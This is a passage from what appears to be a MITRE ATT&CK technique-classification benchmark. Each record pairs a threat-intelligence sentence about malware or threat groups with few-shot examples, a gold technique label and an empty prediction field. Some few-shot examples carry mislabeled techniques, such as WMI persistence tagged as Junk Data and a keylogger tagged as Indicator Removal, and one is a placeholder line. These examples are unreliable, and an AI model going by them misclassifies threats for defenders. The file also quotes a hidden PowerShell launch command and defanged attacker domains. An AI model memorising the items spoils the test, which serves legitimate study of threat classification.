Shell. They also used AdFind to enumerate domains and to discover trust between federated domains.\n\t - T1482: Domain Trust Discovery\n- Text: uses and other Active Directory utilities to enumerate hosts.\n\t - T1018: Remote System Discovery\n- Text: OSInfo enumerates local and domain users\n\t - T1087.001: Account Discovery - Local Account\n\t - T1087.002: Account Discovery - Domain Account\n", + "input": "Nltest may be used to enumerate the parent domain of a local machine using \"/parentdomain\".", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: collects general system enumeration data about the infected machine and checks the OS version.\n\t - T1082: System Information Discovery\n- Text: SombRAT can execute \"getinfo\" to identify the username on a compromised host.\n\t - T1033: System Owner/User Discovery\n- Text: Patchwork ran a reverse shell with Meterpreter. Patchwork used JavaScript code and .SCT files on victim machines.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", + "input": "NavRAT uses \"systeminfo\" on a victim\u2019s machine.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Forfiles can be used to locate certain types of files/directories in a system.(ex: locate all files with a specific extension, name, and/or age)\n\t - T1083: File and Directory Discovery\n- Text: SLOWDRIFT collects and sends system information to its C2.\n\t - T1082: System Information Discovery\n- Text: Turla has used WebDAV to upload stolen USB files to a cloud drive. Turla has also exfiltrated stolen files to OneDrive and 4shared.\n\t - T1567.002: Exfiltration Over Web Service - Exfiltration to Cloud Storage\n", + "input": "TAINTEDSCRIBE can use \"DriveList\" to retrieve drive information.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Frankenstein has run encoded commands from the command line.\n\t - T1027: Obfuscated Files or Information\n- Text: TrailBlazer is a sophisticated malware family that provides modular functionality and a very low prevalence. TrailBlazer persists on a compromised host using WMI event subscriptions4 \u2014 a technique also used by SeaDuke \u2014 although this persistence mechanism is not exclusive to COZY BEAR.5\n\t - T1001.001: Data Obfuscation - Junk Data\n- Text: macOS.OSAMiner has used run-only Applescripts, a compiled and stripped version of AppleScript, to remove human readable indicators to evade detection.\n\t - T1027.008: Obfuscated Files or Information - Stripped Payloads\n", + "input": "Agent Tesla has had its code obfuscated in an apparent attempt to make analysis difficult. Agent Tesla has used the Rijndael symmetric encryption algorithm to encrypt strings.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: WIRTE used documents deploying Visual Basic Script (VBS), potentially delivered through spear phishing, decoys with Arabic content, occasionally associated with Palestinian matters\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: This process executes a command to maliciously use the legitimate wmic.exe to initialize an XSL Script Processing (MITRE Technique T1220) attack. The attack executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain (qnccmvbrh.wilstonbrwsaq[.]pw\n\t - T1220: XSL Script Processing\n- Text: LazyScripter has used JavaScript in its attacks.\n\t - T1059.007: Command and Scripting Interpreter - JavaScript\n", + "input": "Higaisa has used VBScript code on the victim's machine.", + "gold": "- T1059.005: Command and Scripting Interpreter - Visual Basic", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT38 has conducted watering holes schemes to gain initial access to victims.\n\t - T1189: Drive-by Compromise\n- Text: Threat Group-3390 has embedded malicious code into websites to screen a potential victim's IP address and then exploit their browser if they are of interest.\n\t - T1608.004: Stage Capabilities - Drive-by Target\n- Text: Observed GoldMax C2 domains are high-reputation and high-prevalence, often acquired from domain resellers so that Whois records retain the creation date from their previous registration, or domains that may have been compromised. This tactic complements NOBELIUM\u2019s operational security strategy as these domains are more likely to be overlooked by security products and analysts based on their perceived long-lived domain ownership. Put simply, several domains we have shared as GoldMax C2 domains are only associated with NOBELIUM after the time they were re-sold or compromised \u2013 and Microsoft has provided that indicator context where it is available to us\n\t - T1584.001: Compromise Infrastructure - Domains\n", + "input": "During C0010, UNC3890 actors likely established a watering hole that was hosted on a login page of a legitimate Israeli shipping company that was active until at least November 2021.", + "gold": "- T1189: Drive-by Compromise", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cobalt Group has used DNS tunneling for C2.\n\t - T1071.004: Application Layer Protocol - DNS\n- Text: Emotet is one of the most widely distributed and actively developed malware families on the crimeware landscape today. Emotet began purely as a banking trojan, but over the years, has continued to evolve and more recently, has been associated with some larger-scale targeted Ryuk ransomware infections. Emotet is commonly delivered via both macro-laden office documents, as well as URL-based spam messages that lead to an eventual infection. It's not uncommon to see Emotet reuse of some of the command and control (C2) servers over more extended periods. The goal of Emotet, as is the case with crimeware-based threats, is monetary. Attackers use Emotet to deliver modular payloads it can use to monetize infections\n\t - T1571: Non-Standard Port\n- Text: Squirrelwaffle has used HTTP POST requests for C2 communications.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", + "input": "Tropic Trooper's backdoor has communicated to the C2 over the DNS protocol.", + "gold": "- T1071.004: Application Layer Protocol - DNS", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Then, it will launch Dec.exe using PowerShell with the command \u201c cmd.exe /c powershell - WindowStyle Hidden Start-Process Dec.exe - WindowStyle maximized \u201d.\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: BONDUPDATER waits to receive an instruction from the C2 server that starts with \u201cE\u201d before writing the downloaded data to the supplied filename. After receiving the \u201cE\u201d instruction, the Trojan will write the base64 decoded data to the file and process the newly created file. Figure 27 shows the C2 server providing the \u201cE\u201d instruction within the TXT answer. In the current example, the Trojan would treat the newly saved file as a script thanks to the filename ending with the \u201c0\u201d character. The Trojan would run the contents of the file using \u201ccmd.exe\u201d and save the output to a file named \u201cproc10100\u201d that will be uploaded to the C2 server.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: MuddyWater has used malware that leveraged WMI for execution and querying host information.\n\t - T1047: Windows Management Instrumentation\n", + "input": "KGH_SPY can execute PowerShell commands on the victim's machine.", + "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: These commands allow the threat group to gain information about the compromised computer and the network to which it belongs. Using this information, they can decide to explore further or instruct the compromised computer to download additional malware\n\t - T1016: System Network Configuration Discovery\n\t - T1082: System Information Discovery\n\t - T1007: System Service Discovery\n- Text: PoshC2 can enumerate local and domain user account information.\n\t - T1087.001: Account Discovery - Local Account\n\t - T1087.002: Account Discovery - Domain Account\n- Text: ZxShell has a feature to create local user accounts.\n\t - T1136.001: Create Account - Local Account\n", + "input": "S-Type runs the command \"net start\" on a victim.", + "gold": "- T1007: System Service Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Replying to @ESETresearchAttackers replaced win_fw.dll, an internal component that is executed during IDA Pro installation, with a malicious DLL. The malicious win_fw.dll creates a Windows scheduled task that starts a second malicious component, idahelper.dll, from the IDA plugins folder\n\t - T1036.004: Masquerading - Masquerade Task or Service\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n- Text: When loaded with startup command 2, the installer can copy the original explorer.exe file inside its current running directory and rename d3d9.dll to uxtheme.dll. In this case the persistence is achieved by loading the original explorer.exe from its startup location and, using DLL side-loading, passing the execution control to the stage 4 malware (discussed in next section\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: Meteor execution begins from a scheduled task named `Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeAll` and it creates a separate scheduled task called `mstask` to run the wiper only once at 23:55:00.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n", + "input": "Attor's dispatcher disguises itself as a legitimate task (i.e., the task name and description appear legitimate).", + "gold": "- T1036.004: Masquerading - Masquerade Task or Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ursnif has gathered information about running services.\n\t - T1007: System Service Discovery\n- Text: UBoatRAT can list running processes on the system.\n\t - T1057: Process Discovery\n- Text: Turla has used \"net localgroup\" and \"net localgroup Administrators\" to enumerate group information, including members of the local administrators group.\n\t - T1069.001: Permission Groups Discovery - Local Groups\n", + "input": "During Operation CuckooBees, the threat actors used the `tasklist` command as part of their advanced reconnaissance.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: WhisperGate has used `InstallUtil.exe` as part of its process to disable Windows Defender.\n\t - T1218.004: System Binary Proxy Execution - InstallUtil\n- Text: If the connection to the C2 server is successful, the script parses the output and invokes it using IEX. The script sleeps for a random number of seconds between 60 and 100 after each attempt to reach the C2. The GET requests will be parsed by LitePower and invoked using PowerShell\u2019s IEX function\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: Download a file from a remote server - Create a text file on the local machine - Execute a file - Execute a shell (cmd.exe) command and save the results to disk - Upload the results of a previously executed shell command to a remote server\n\t - T1105: Ingress Tool Transfer\n", + "input": "WhisperGate can download and execute AdvancedRun.exe via `sc.exe`.", + "gold": "- T1569.002: System Services - Service Execution", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Sandworm Team has conducted research against potential victim websites as part of its operational planning.\n\t - T1594: Search Victim-Owned Websites\n- Text: sent shortened URL links over email to victims. The URLs linked to Word documents with malicious macros that execute PowerShells scripts to download Pupy.\n\t - T1598.003: Phishing for Information - Spearphishing Link\n- Text: In this attack, spear phishing was used as the initial infection vector. Before launching the attack, the group studied publicly available information about the targeted organization and identified email addresses belonging to various departments of the company\n\t - T1589.002: Gather Victim Identity Information - Email Addresses\n", + "input": "Silent Librarian has searched victim's websites to identify the interests and academic areas of targeted individuals and to scrape source code, branding, and organizational contact information for phishing pages.", + "gold": "- T1594: Search Victim-Owned Websites", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TrickBot has used \"printf\" and file I/O loops to delay process execution as part of API hammering.\n\t - T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion\n- Text: Sandworm Team has distributed NotPetya by compromising the legitimate Ukrainian accounting software M.E.Doc and replacing a legitimate software update with a malicious one.\n\t - T1195.002: Supply Chain Compromise - Compromise Software Supply Chain\n- Text: No matching sample found for T1546.016\n", + "input": "GoldenSpy's installer has delayed installation of GoldenSpy for two hours after it reaches a victim system.", + "gold": "- T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Finally, it creates and runs a shell script at /tmp/.server.sh, which also establishes a reverse shell\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n- Text: RobbinHood uses cmd.exe on the victim's computer.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: is capable of creating reverse shell.\n\t - T1059: Command and Scripting Interpreter\n", + "input": "Derusbi is capable of creating a remote Bash shell and executing commands.", + "gold": "- T1059.004: Command and Scripting Interpreter - Unix Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: It is worth noting that in 2019, this actor used a fake file extension (*.png) for the MSI binary hosted on the attacker-controlled GitHub account\n\t - T1583.006: Acquire Infrastructure - Web Services\n- Text: But what really makes this backdoor interesting is the way in which it communicates with attackers in order to receive commands. Python/TeleBot abuses the Telegram Bot API from Telegram Messenger to communicate with the attackers. We have informed Telegram of this abuse of their communication platform\n\t - T1102.002: Web Service - Bidirectional Communication\n- Text: APT29 has acquired C2 domains, sometimes through resellers.\n\t - T1583.001: Acquire Infrastructure - Domains\n", + "input": "Kimsuky has used Blogspot pages for C2.", + "gold": "- T1102.002: Web Service - Bidirectional Communication", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: CSPY Downloader can use GET requests to download additional payloads from C2.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: MCMD can upload additional files to a compromised host.\n\t - T1105: Ingress Tool Transfer\n- Text: Some malware uses a list of ordered port numbers to choose a port for C2 traffic, which includes uncommonly used ports such as 995, 1816, 465, 1521, 3306, and many others.\n\t - T1571: Non-Standard Port\n", + "input": "DEATHRANSOM can use HTTPS to download files.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During C0015, the threat actors used a DLL named `D8B3.dll` that was injected into the Winlogon process.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: Multiple samples contain UAC bypass code for both 32 and 64-bit systems. The UAC bypass code is stored as 'DAT' in the file's resource section\n\t - T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control\n- Text: If the process is running with Low integrity, REvil terminates the current process and launches another instance of itself via ShellExecute using the \"runas\" command, which executes the new instance with administrative rights\n\t - T1134.002: Access Token Manipulation - Create Process with Token\n", + "input": "FinFisher injects itself into various processes depending on whether it is low integrity or high integrity.", + "gold": "- T1055.001: Process Injection - Dynamic-link Library Injection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Pupy can communicate over HTTP for C2.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: We have been tracking RDAT since 2017, when we first saw this tool uploaded to a webshell related to the TwoFace webshell discussed in our Striking Oil blog published on September 26, 2017. RDAT has been under active development since 2017, resulting in multiple variations of the tool that rely on both HTTP and DNS tunneling for C2 communications. In June 2018, the developer of RDAT added the ability to use Exchange Web Services (EWS) to send and receive emails for C2 communications. This email-based C2 channel is novel in its design, as it relies on steganography to hide commands and exfiltrates data within BMP images attached to the emails. The combination of using emails with steganographic images to carry the data across the C2 can result in this activity being much more difficult to detect and allow for higher chances of defense evasion\n\t - T1071.003: Application Layer Protocol - Mail Protocols\n\t - T1001.002: Data Obfuscation - Steganography\n- Text: FIN4 has used Tor to log in to victims' email accounts.\n\t - T1090.003: Proxy - Multi-hop Proxy\n", + "input": "A PingPull variant can communicate with its C2 servers by using HTTPS.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Comnie will make requests to these URLs, looking for base64-encoded data after an identifier of \u2018magnet:/\u2019, as seen in the example below: Figure 14 GitHub storing Comnie C2 information In the example above, the C2 information is being stored within the user\u2019s URL parameter within GitHub\n\t - T1102: Web Service\n\t - T1041: Exfiltration Over C2 Channel\n- Text: CosmicDuke exfiltrates collected files over FTP or WebDAV. Exfiltration servers can be separately configured from C2 servers.\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n- Text: performs data exfiltration is accomplished through the following command-line command: from (- --).txt.\n\t - T1020: Automated Exfiltration\n", + "input": "REvil can exfiltrate host and malware information to C2 servers.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The Gorgon Group Crew Breakdown Finding accessible directories, in combination with their other operational security failures, made it easy to start connecting the dots on Gorgon Group members. 360 and Tuisec already identified some Gorgon Group members. In addition to Subaat, we counted an additional four actors performing attacks as part of Gorgon Group. While it\u2019s not known if the attackers physically reside in Pakistan, all members of Gorgon Group purport to be in Pakistan based on their online personas. fudpages One member of Gorgon Group- we're calling \u2018fudpages\u2019, was found during this campaign activity based on their utilization of shared infrastructure. One specific Microsoft document drew our attention. 446e1c80102c8b9662d66d44525cb9f519369061b02446e0d4cd30cd26d79a25) This Microsoft Word document was sent via email to several industries across the US and Switzerland. We noticed that this document pulls down additional malware from a C2 also being used in attacks by other Gorgon Group members. Additionally, this document communicates to a relatively new piece of C2 infrastructure- umarguzardijye[.]com, which is hosted on 91[.]234[.]99[.]206\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: APT28 attempted to get users to click on Microsoft Office attachments containing malicious macro scripts.\n\t - T1204.002: User Execution - Malicious File\n- Text: Based on our analysis, financial organizations in Turkey were targeted via spear phishing emails containing a malicious Microsoft Word document\n\t - T1598.002: Phishing for Information - Spearphishing Attachment\n", + "input": "Tonto Team has delivered payloads via spearphishing attachments.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: They renamed their files to make them look like legitimate files, for example, trilog.exe, named after a legitimate Schneider Electric application\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: Make a unique filename. This useful utility is widely used by malware to make random, unique file and directory names for payloads. Despite the name, mktemp does not have to be used only in the /tmp directory\n\t - T1564: Hide Artifacts\n\t - T1564: Hide Artifacts\n- Text: After gaining an initial foothold on a compromised system, the NICKEL actors routinely performed reconnaissance on the network, working to gain access to additional accounts or higher-value systems. NICKEL typically deployed a keylogger to capture credentials from users on compromised systems\n\t - T1070: Indicator Removal\n\t - T1114.002: Email Collection - Remote Email Collection\n", + "input": "LightNeuron has used filenames associated with Exchange and Outlook for binary and configuration files, such as \"winmail.dat\".", + "gold": "- T1036.005: Masquerading - Match Legitimate Name or Location", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: build_downer has the ability to determine the local time to ensure malware installation only happens during the hours that the infected system is active.\n\t - T1124: System Time Discovery\n- Text: APT39 used Remexi to collect usernames from the system.\n\t - T1033: System Owner/User Discovery\n- Text: A module in collects information on available printers and disk drives.\n\t - T1120: Peripheral Device Discovery\n", + "input": "MoonWind obtains the victim's current time.", + "gold": "- T1124: System Time Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The data exfiltration process runs in the following sequence: The temp.ini files are copied into a text file that matches the pattern\n\t - T1020: Automated Exfiltration\n- Text: Controlled by Micropsia operators, the malware is able to register to an event of USB volume insertion to detect new connected USB flash drives. Once an event is triggered, Micropsia executes an RAR tool to recursively archive files based on a predefined list of file extensions (*.xls, *.xlsx, *.csv, *.odt, *.doc, *.docx, *.ppt, *.pptx, *.pdf, *.mdb, *.accdb, *.accde, *.txt\n\t - T1560.001: Archive Collected Data - Archive via Utility\n\t - T1119: Automated Collection\n- Text: Kessel can RC4-encrypt credentials before sending to the C2.\n\t - T1560: Archive Collected Data\n", + "input": "Gamaredon Group has used modules that automatically upload gathered documents to the C2 server.", + "gold": "- T1020: Automated Exfiltration", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The sample arrives as an app bundled in a Zip archive. It uses the icon for a Word document file as a disguise, attempting to pass itself off as a legitimate document file\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: is used to schedule tasks on a Windows system to run at a specific date and time.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: Saint Bot has been disguised as a legitimate executable, including as Windows SDK.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n", + "input": "Maze operators have created scheduled tasks masquerading as \"Windows Update Security\", \"Windows Update Security Patches\", and \"Google Chrome Security Update\" designed to launch the ransomware.", + "gold": "- T1036.004: Masquerading - Masquerade Task or Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ajax Security Team has used personalized spearphishing attachments.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: ZxShell can transfer files from a compromised host.\n\t - T1005: Data from Local System\n- Text: APT30 has relied on users to execute malicious file attachments delivered via spearphishing emails.\n\t - T1204.002: User Execution - Malicious File\n", + "input": "Kimsuky has collected Office, PDF, and HWP documents from its victims.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE 